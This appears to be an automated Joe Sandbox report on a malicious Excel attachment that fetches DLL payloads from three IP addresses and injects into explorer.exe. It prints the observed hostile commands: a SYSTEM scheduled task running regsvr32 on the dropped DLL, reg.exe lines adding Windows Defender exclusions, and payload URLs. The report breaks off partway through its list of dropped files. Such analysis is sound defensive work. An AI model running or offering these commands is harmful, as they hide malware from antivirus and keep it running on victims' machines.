    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_10021C96 pushad ; iretd 12_2_10021C9E
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_10026CE9 push dword ptr [esp+eax*4+38h]; iretd 12_2_10026CF4
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_10026105 push edi; ret 12_2_1002611C
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_1002514B pushad ; iretd 12_2_1002514C
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_10012AEC GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,5_2_10012AEC
    Source: Fiosa2.der.23.drStatic PE information: real checksum: 0x7af7b should be: 0x88ca7
    Source: Fiosa.der.6.drStatic PE information: real checksum: 0x7af7b should be: 0xfeba5
    Source: Fiosa.der.17.drStatic PE information: real checksum: 0x7af7b should be: 0x88ca7
    Source: Fiosa1.der.14.drStatic PE information: real checksum: 0x7af7b should be: 0x88ca7

    Persistence and Installation Behavior:

    Uses cmd line tools excessively to alter registry or file data
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: reg.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Fiosa.der
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Fiosa1.der
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Fiosa2.der
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa.der
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa1.der
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa2.der
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.7272820602[2].dat
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.7272820602[1].dat
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.7272820602[3].dat

    Boot Survival:

    Drops PE files to the user root directory
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa2.der
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa.der
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa1.der
    Uses schtasks.exe or at.exe to add and modify task schedules
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn kxizfug /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 17:30 /ET 17:42

    Hooking and other Techniques for Hiding and Protection:

    Overwrites code with unconditional jumps - possibly settings hooks in foreign process
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2208 base: 4E102D value: E9 BA 4C BA FF
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2180 base: 4E102D value: E9 BA 4C BA FF
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 448 base: 4E102D value: E9 BA 4C BA FF
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 1704 base: 4E102D value: E9 BA 4C BA FF
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOOPENFILEERRORBOX
    Source: Claim-1368769328-09242021.xlsStream path 'Workbook' entropy: 7.94597570807 (max. 8.0)
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3036Thread sleep count: 47 > 30
    Source: C:\Windows\SysWOW64\explorer.exe TID: 2192Thread sleep time: -144000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1124Thread sleep count: 46 > 30
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep count: 47 > 30
    Source: C:\Windows\SysWOW64\explorer.exe TID: 2188Thread sleep count: 31 > 30
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2848Thread sleep count: 46 > 30
    Source: C:\Windows\SysWOW64\explorer.exe TID: 2664Thread sleep count: 141 > 30
    Source: C:\Windows\SysWOW64\explorer.exe TID: 2664Thread sleep time: -112000s >= -30000s
    Source: C:\Windows\SysWOW64\explorer.exe TID: 2992Thread sleep count: 31 > 30
    Source: C:\Windows\SysWOW64\explorer.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_6-11419
    Source: C:\Windows\SysWOW64\regsvr32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_5-12469
    Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.7272820602[2].dat
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.7272820602[1].dat
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.7272820602[3].dat
    Source: C:\Windows\SysWOW64\regsvr32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_5-11417
    Source: C:\Windows\SysWOW64\explorer.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_6-10091
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess information queried: ProcessInformation
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_1000D01F GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetWindowsDirectoryW,5_2_1000D01F
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_1000AEB4 FindFirstFileW,FindNextFileW,5_2_1000AEB4
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_0008AEB4 FindFirstFileW,FindNextFileW,6_2_0008AEB4
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_0008AEB4 FindFirstFileW,FindNextFileW,14_2_0008AEB4
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_0008AEB4 FindFirstFileW,FindNextFileW,17_2_0008AEB4
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_10005F82 EntryPoint,OutputDebugStringA,GetModuleHandleA,GetModuleFileNameW,GetLastError,memset,MultiByteToWideChar,GetFileAttributesW,CreateThread,SetLastError,5_2_10005F82
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_10012AEC GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,5_2_10012AEC
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_10029660 GetProcessHeap,RtlAllocateHeap,5_2_10029660
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_1007792E mov eax, dword ptr fs:[00000030h]5_2_1007792E
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_1007785D mov eax, dword ptr fs:[00000030h]5_2_1007785D
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_10077464 push dword ptr fs:[00000030h]5_2_10077464
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_1007792E mov eax, dword ptr fs:[00000030h]9_2_1007792E
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_1007785D mov eax, dword ptr fs:[00000030h]9_2_1007785D
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_10077464 push dword ptr fs:[00000030h]9_2_10077464
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_1007792E mov eax, dword ptr fs:[00000030h]12_2_1007792E
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_1007785D mov eax, dword ptr fs:[00000030h]12_2_1007785D
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_10077464 push dword ptr fs:[00000030h]12_2_10077464
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 16_2_1007792E mov eax, dword ptr fs:[00000030h]16_2_1007792E
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 16_2_1007785D mov eax, dword ptr fs:[00000030h]16_2_1007785D
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 16_2_10077464 push dword ptr fs:[00000030h]16_2_10077464
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_00085A61 RtlAddVectoredExceptionHandler,6_2_00085A61
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_00085A61 RtlAddVectoredExceptionHandler,17_2_00085A61

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Maps a DLL or memory area into another processShow sources
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exe; Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
    Writes to foreign memory regions
    Source: C:\Windows\SysWOW64\regsvr32.exe; Memory written: C:\Windows\SysWOW64\explorer.exe base: B0000
    Source: C:\Windows\SysWOW64\regsvr32.exe; Memory written: C:\Windows\SysWOW64\explorer.exe base: 4E102D
    Allocates memory in foreign processes
    Source: C:\Windows\SysWOW64\regsvr32.exe; Memory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and write
    Injects code into the Windows Explorer (explorer.exe)
    Source: C:\Windows\SysWOW64\regsvr32.exe; Memory written: PID: 2208 base: B0000 value: 9C
    Source: C:\Windows\SysWOW64\regsvr32.exe; Memory written: PID: 2208 base: 4E102D value: E9
    Source: C:\Windows\SysWOW64\regsvr32.exe; Memory written: PID: 2180 base: B0000 value: 9C
    Source: C:\Windows\SysWOW64\regsvr32.exe; Memory written: PID: 2180 base: 4E102D value: E9
    Source: C:\Windows\SysWOW64\regsvr32.exe; Memory written: PID: 448 base: B0000 value: 9C
    Source: C:\Windows\SysWOW64\regsvr32.exe; Memory written: PID: 448 base: 4E102D value: E9
    Source: C:\Windows\SysWOW64\regsvr32.exe; Memory written: PID: 1704 base: B0000 value: 9C
    Source: C:\Windows\SysWOW64\regsvr32.exe; Memory written: PID: 1704 base: 4E102D value: E9
    Yara detected hidden Macro 4.0 in Excel
    Source: Yara match; File source: Claim-1368769328-09242021.xls, type: SAMPLE
    Source: C:\Windows\System32\regsvr32.exe; Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa.der
    Source: C:\Windows\SysWOW64\regsvr32.exe; Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\explorer.exe; Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn kxizfug /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 17:30 /ET 17:42
    Source: C:\Windows\System32\regsvr32.exe; Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa1.der
    Source: C:\Windows\SysWOW64\regsvr32.exe; Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\System32\regsvr32.exe; Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: C:\Windows\SysWOW64\regsvr32.exe; Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\System32\regsvr32.exe; Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa2.der
    Source: C:\Windows\SysWOW64\regsvr32.exe; Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\explorer.exe; Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Autiufytlfbb' /d '0'
    Source: C:\Windows\SysWOW64\explorer.exe; Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Nweouxwwcjwu' /d '0'
    Source: C:\Windows\System32\regsvr32.exe; Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: explorer.exe, 00000006.00000002.870017423.0000000000EC0000.00000002.00020000.sdmp; Binary or memory string: Shell_TrayWnd
    Source: explorer.exe, 00000006.00000002.870017423.0000000000EC0000.00000002.00020000.sdmp; Binary or memory string: !Progman
    Source: explorer.exe, 00000006.00000002.870017423.0000000000EC0000.00000002.00020000.sdmp; Binary or memory string: Program Manager<
    Source: C:\Windows\SysWOW64\regsvr32.exe; Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\explorer.exe; Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\explorer.exe; Code function: 6_2_000831C2 CreateNamedPipeA,6_2_000831C2
    Source: C:\Windows\SysWOW64\regsvr32.exe; Code function: 5_2_1000980C GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,5_2_1000980C
    Source: C:\Windows\SysWOW64\regsvr32.exe; Code function: 5_2_1000D01F GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetWindowsDirectoryW,5_2_1000D01F

    Mitre Att&ck Matrix

    Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
    Valid Accounts | Command and Scripting Interpreter 11 | Scheduled Task/Job 1 | Process Injection 413 | Masquerading 121 | Credential API Hooking 1 | System Time Discovery 1 | Remote Services | Credential API Hooking 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
    Default Accounts | Scheduled Task/Job 1 | Boot or Logon Initialization Scripts | Scheduled Task/Job 1 | Disable or Modify Tools 1 | LSASS Memory | Security Software Discovery 2 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
    Domain Accounts | Scripting 2 | Logon Script (Windows) | Logon Script (Windows) | Modify Registry 1 | Security Account Manager | Virtualization/Sandbox Evasion 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
    Local Accounts | Native API 3 | Logon Script (Mac) | Logon Script (Mac) | Virtualization/Sandbox Evasion 1 | NTDS | Process Discovery 3 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 21 | SIM Card Swap | | Carrier Billing Fraud
    Cloud Accounts | Exploitation for Client Execution 32 | Network Logon Script | Network Logon Script | Process Injection 413 | LSA Secrets | File and Directory Discovery 2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
    Replication Through Removable Media | Launchd | Rc.common | Rc.common | Scripting 2 | Cached Domain Credentials | System Information Discovery 15 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
    External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information 11 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
    Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing 1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

    Behavior Graph

    [Behavior graph (image not preserved): ID: 489877, Sample: Claim-1368769328-09242021.xls, Startdate: 24/09/2021, Architecture: WINDOWS, Score: 100]

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    No Antivirus matches

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    Source | Detection | Scanner | Label
    http://111.90.148.104/44463.7272820602.dat | 0% | Avira URL Cloud | safe
    http://www.%s.comPA | 0% | URL Reputation | safe
    http://190.14.37.173/44463.7272820602.dat | 0% | Avira URL Cloud | safe
    http://51.89.115.111/44463.7272820602.dat | 0% | Avira URL Cloud | safe
    http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    Name | Malicious | Antivirus Detection | Reputation
    http://111.90.148.104/44463.7272820602.dat | false | Avira URL Cloud: safe | unknown
    http://190.14.37.173/44463.7272820602.dat | false | Avira URL Cloud: safe | unknown
    http://51.89.115.111/44463.7272820602.dat | false | Avira URL Cloud: safe | unknown

    URLs from Memory and Binaries

    Name | Source | Malicious | Antivirus Detection | Reputation
    http://www.%s.comPA | regsvr32.exe, 00000005.00000002.497205948.0000000002260000.00000002.00020000.sdmp, explorer.exe, 00000006.00000002.870043428.00000000022C0000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.551601512.0000000002360000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.560498474.0000000000F60000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000002.553204849.0000000002120000.00000002.00020000.sdmp | false | URL Reputation: safe | low
    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | regsvr32.exe, 00000005.00000002.497205948.0000000002260000.00000002.00020000.sdmp, explorer.exe, 00000006.00000002.870043428.00000000022C0000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.551601512.0000000002360000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.560498474.0000000000F60000.00000002.00020000.sdmp | false | | high
    http://servername/isapibackend.dll | regsvr32.exe, 00000003.00000002.498695724.0000000001D80000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.496898931.0000000000A90000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.553114227.0000000001DA0000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.551291821.00000000008F0000.00000002.00020000.sdmp, regsvr32.exe, 0000000B.00000002.564152659.00000000009B0000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.558923277.0000000000BF0000.00000002.00020000.sdmp | false | Avira URL Cloud: safe | low

      Contacted IPs

      Public

      IP | Domain | Country | ASN | ASN Name | Malicious
      190.14.37.173 | unknown | Panama | 52469 | OffshoreRacksSAPA | false
      51.89.115.111 | unknown | France | 16276 | OVHFR | false
      111.90.148.104 | unknown | Malaysia | 45839 | SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY | false

      General Information

      Joe Sandbox Version:33.0.0 White Diamond
      Analysis ID:489877
      Start date:24.09.2021
      Start time:17:26:08
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 13m 27s
      Hypervisor based Inspection enabled:false
      Report type:full
      Sample file name:Claim-1368769328-09242021.xls
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
      Number of analysed new started processes analysed:26
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal100.expl.evad.winXLS@33/11@0/3
      EGA Information:
      • Successful, ratio: 100%
      HDC Information:
      • Successful, ratio: 24% (good quality ratio 22.7%)
      • Quality average: 77.2%
      • Quality standard deviation: 27%
      HCA Information:
      • Successful, ratio: 87%
      • Number of executed functions: 142
      • Number of non-executed functions: 92
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Found application associated with file extension: .xls
      • Changed system and user locale, location and keyboard layout to English - United States
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Scroll down
      • Close Viewer
      Warnings:
      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
      • Not all processes were analyzed, report is missing behavior information
      • Report creation exceeded maximum time and may have missing disassembly code information.
      • Report size exceeded maximum capacity and may have missing behavior information.
      • Report size getting too big, too many NtSetInformationFile calls found.

      Simulations

      Behavior and APIs

      Time | Type | Description
      17:27:59 | API Interceptor | 51x Sleep call for process: regsvr32.exe modified
      17:28:01 | API Interceptor | 890x Sleep call for process: explorer.exe modified
      17:28:03 | API Interceptor | 1x Sleep call for process: schtasks.exe modified
      17:28:04 | Task Scheduler | Run new task: kxizfug path: regsvr32.exe s>-s "C:\Users\user\Fiosa.der"

      Joe Sandbox View / Context

      IPs

      Match | Associated Sample Name / URL | Detection | Context
      190.14.37.173 | Claim-1763045001-09242021.xls | malicious | 190.14.37.173/44463.6863100694.dat
      190.14.37.173 | Claim-680517779-09242021.xls | malicious | 190.14.37.173/44463.6668827546.dat
      51.89.115.111 | Claim-1763045001-09242021.xls | malicious | 51.89.115.111/44463.6863100694.dat
      51.89.115.111 | Claim-680517779-09242021.xls | malicious | 51.89.115.111/44463.6668827546.dat
      111.90.148.104 | Claim-1763045001-09242021.xls | malicious | 111.90.148.104/44463.6863100694.dat
      111.90.148.104 | Claim-680517779-09242021.xls | malicious | 111.90.148.104/44463.6668827546.dat

      Domains

      No context

      ASN


      JA3 Fingerprints

      No context

      Dropped Files

      Match | Associated Sample Name / URL | Detection
      C:\Users\user\Fiosa.der | Claim-1763045001-09242021.xls | malicious
      C:\Users\user\Fiosa.der | Claim-680517779-09242021.xls | malicious
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.7272820602[3].dat | Claim-680517779-09242021.xls | malicious
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.7272820602[2].dat | Claim-680517779-09242021.xls | malicious
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.7272820602[1].dat | Claim-680517779-09242021.xls | malicious

                Created / dropped Files

                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.7272820602[1].dat
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):495616
                Entropy (8bit):6.443782963420258
                Encrypted:false
                SSDEEP:6144:+bqzVbbUYjG8AClk8+O05KhoSiMsJZuSsnDxeHakVqhhmaM+5Vg0nKH5PnFyuns:sqxgYjG8ACv+9KhpsJZRXH52LMcg5n
                MD5:BC74BF4AB8188396FD2874D71A5C4796
                SHA1:F06D95A72071DA2A229FACC45D7FD85DC8E877AB
                SHA-256:09665AC0C492BE214A6AE089600B01B3517AE6894F735764B13F71293E035827
                SHA-512:A01F275FDF125154FDCD2B45CE43561EF1D2503D714E45A49348640936909DF7E2655086EF73E1C4C9C2E514FB7AE1004D3DEC193CC6AE264673148A8225B31F
                Malicious:true
                Joe Sandbox View:
                • Filename: Claim-680517779-09242021.xls, Detection: malicious
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.7272820602[2].dat
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):495616
                Entropy (8bit):6.443782963420258
                Encrypted:false
                SSDEEP:6144:+bqzVbbUYjG8AClk8+O05KhoSiMsJZuSsnDxeHakVqhhmaM+5Vg0nKH5PnFyuns:sqxgYjG8ACv+9KhpsJZRXH52LMcg5n
                MD5:BC74BF4AB8188396FD2874D71A5C4796
                SHA1:F06D95A72071DA2A229FACC45D7FD85DC8E877AB
                SHA-256:09665AC0C492BE214A6AE089600B01B3517AE6894F735764B13F71293E035827
                SHA-512:A01F275FDF125154FDCD2B45CE43561EF1D2503D714E45A49348640936909DF7E2655086EF73E1C4C9C2E514FB7AE1004D3DEC193CC6AE264673148A8225B31F
                Malicious:true
                Joe Sandbox View:
                • Filename: Claim-680517779-09242021.xls, Detection: malicious
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.7272820602[3].dat
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):495616
                Entropy (8bit):6.443782963420258
                Encrypted:false
                SSDEEP:6144:+bqzVbbUYjG8AClk8+O05KhoSiMsJZuSsnDxeHakVqhhmaM+5Vg0nKH5PnFyuns:sqxgYjG8ACv+9KhpsJZRXH52LMcg5n
                MD5:BC74BF4AB8188396FD2874D71A5C4796
                SHA1:F06D95A72071DA2A229FACC45D7FD85DC8E877AB
                SHA-256:09665AC0C492BE214A6AE089600B01B3517AE6894F735764B13F71293E035827
                SHA-512:A01F275FDF125154FDCD2B45CE43561EF1D2503D714E45A49348640936909DF7E2655086EF73E1C4C9C2E514FB7AE1004D3DEC193CC6AE264673148A8225B31F
                Malicious:true
                Joe Sandbox View:
                • Filename: Claim-680517779-09242021.xls, Detection: malicious
                C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):162688
                Entropy (8bit):4.254514811147695
                Encrypted:false
                SSDEEP:1536:C6zL3FNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcm48s:C+JNSc83tKBAvQVCgOtmXmLpLm4l
                MD5:3B8DE4C0D6EBDF711F55D5ED9F1A9AD4
                SHA1:EED893D0E2929281871906E834EADDA4F0A26884
                SHA-256:97404BEB6D871F1BA61B1AE14284528768B4268C885E559E6DF2D32EECEBBF41
                SHA-512:7D68EC7F5036FF565B5C8B7F1E617740583C7143846AABB3ED9D53139BE639A3EB2E64A24F94C54497774766CB8A4378038C86F8E9ADC786085DDAA35F6610F7
                Malicious:false
                C:\Users\user\Fiosa.der
                Process:C:\Windows\SysWOW64\explorer.exe
                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):495616
                Entropy (8bit):1.3741485480829125
                Encrypted:false
                SSDEEP:1536:s2VcC6MtqWgV3vAFNJ3JXS9n5SYCR44u029R+J:WC6MtAAFNJ5XC5SYCi02r+J
                MD5:15C440CEBA523F1FA008FAA03D09AC99
                SHA1:A8EBA7725DB51F790E285D1223FAAED050242063
                SHA-256:4F5DDF752A4621D639C402228BBA62F75450D0E07BEEB36F971F6638C462EA38
                SHA-512:BB4BDCB8D8B76420E97DE1469A0B41B6F8F585751E84FE2ACD6C4230822818B6FF2643CB511DE0D8F1B05B0B3FB6FB8063D587219D22F822FF62F66859F6A6B4
                Malicious:true
                Joe Sandbox View:
                • Filename: Claim-1763045001-09242021.xls, Detection: malicious, Browse
                • Filename: Claim-680517779-09242021.xls, Detection: malicious, Browse
                C:\Users\user\Fiosa1.der
                Process:C:\Windows\SysWOW64\explorer.exe
                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):495616
                Entropy (8bit):1.3741485480829125
                Encrypted:false
                SSDEEP:1536:s2VcC6MtqWgV3vAFNJ3JXS9n5SYCR44u029R+J:WC6MtAAFNJ5XC5SYCi02r+J
                MD5:15C440CEBA523F1FA008FAA03D09AC99
                SHA1:A8EBA7725DB51F790E285D1223FAAED050242063
                SHA-256:4F5DDF752A4621D639C402228BBA62F75450D0E07BEEB36F971F6638C462EA38
